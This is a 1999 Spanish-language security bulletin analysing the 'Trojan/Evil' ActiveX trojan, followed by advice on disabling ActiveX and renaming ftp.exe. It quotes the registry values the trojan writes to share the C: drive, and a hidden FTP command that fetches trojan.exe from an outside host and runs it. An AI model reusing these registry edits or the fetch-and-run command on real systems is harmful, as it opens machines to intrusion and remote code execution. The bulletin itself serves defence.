| |
Lunes 27 de setiembre de 1999.
Nombre: Trojan/Evil
TL security, publicó en la red, información
sobre el primer trojan en Active-X de que se
tenga noticias.
Es un simple código que podría agregarse a
cualquier página HTML.
El código malicioso, genera dos archivos .REG
(archivos que se agregan al registro de Windows
al ser ejecutados), ambos con el mismo nombre
(C:\winfree.reg), pero son creados y ejecutados
en orden, primero uno, luego el otro.
El primero, modifica esta línea del registro:
En Win98:
HKLM\System\CurrentControlSet\Services\VxD\VNETSUP
En WinNT:
HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Network\LanMan\C
En ambos agrega
aquí los valores:
"FileSharing"="Yes"
"PrintSharing"="Yes"
Esto habilita la
opción de poder compartir archivos e impresoras.
Luego genera el segundo
"C:\winfree.reg" y lo ejecuta.
Cuando lo hace, modifica en Win98 y Win NT esta
clave:
HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C
En ambos casos
agrega estos valores:
"Flags"=dword:00000101
"Type"=dword:00000000
"Path"="C:\"
"Parm2enc"=hex:
"Parm1enc"=hex:
"Remark"="FREE_JCzic"
Los cambios
tomarán efecto luego del próximo reinicio de la
computadora.
Este trojan funciona en forma diferente en
Windows NT y Windows 9x.
La versión NT escribe un archivo de lotes
(batch) llamado "C:\p234.bat", que
efectúa pequeñas pausas después de los
primeros reinicios. Genera el archivo
"C:\UPLDFILE.FTP", que ejecuta el FTP
de DOS sin que se vea, con el comando:
ftp -v
-i -s:c:\UPLDFILE.FTP ftp.xoom.com
El archivo
UPLDFILE.FTP es un script que contiene la orden
de bajar de Xoom el archivo
"trojan.exe". Luego de esto ejecuta el
archivo bajado "trojan.exe". Esto lo
repite indefinidamente.
La versión Windows 9x genera a propósito un
mensaje de error:
ERROR:
Exception 00x00000000 in comcat.dll.
Please wait while the file is repaired.
Crea el archivo UPLDFILE.FTP, y ejecuta el FTP de DOS con la
orden:
ftp -v
-i -s:c:\UPLDFILE.FTP ftp.xoom.com
Luego ejecuta el
archivo bajado, "trojan.exe".
Este trojan funciona en Windows 95,98 y NT, bajo
Internet Explorer 5.
Protección
Existe un parche de Microsoft que causa que al
ejecutarse la página HTML se genere una
advertencia de seguridad, pero de seguro, son
muchos los que no deben haber bajado estas
actualizaciones.
Lo grave de esto, es que los componentes del
código ActiveX pueden ser fácilmente cortados y
pegados en cualquier página HTML.
Además, al ser un código de texto, disponible
en la red libremente, cualquiera podría cambiar
ciertos parámetros, por lo cuál, los que damos
en este informe deben tomarse solo como
referencia para ilustrar su funcionamiento.
Tal vez sea conveniente desactivar las opciones
Active X de su explorador. Para desactivar Active
X en el Outlook, vaya a "Herramientas",
"Opciones", "Seguridad", y en
"Zona de seguridad" marque "Zona
de seguridad restringida" y de al botón de
"Aplicar".
Luego, desde el "Panel de control" de
Windows (Mi PC, Panel de Control), "Opciones
de Internet", vaya a "Seguridad",
pinche en "Sitios restringidos",
"Personalizar nivel" y en
"Secuencia de comandos Active X" marque
la opción "desactivar", pinche en
"Aplicar" y luego en "Salir".
Otra cosa que usted puede hacer, es renombrar el
comando "ftp.exe" de DOS (se encuentra
en C:\Windows, como "ftp-.exe" por
ejemplo. De este modo, el trojan no podrá
ejecutarlo. Puede hacer esto desde el Explorador
de Windows, o desde un ventana DOS, desde la
línea de comando, puede teclear: ren
ftp.exe ftp-.exe y Enter.
|
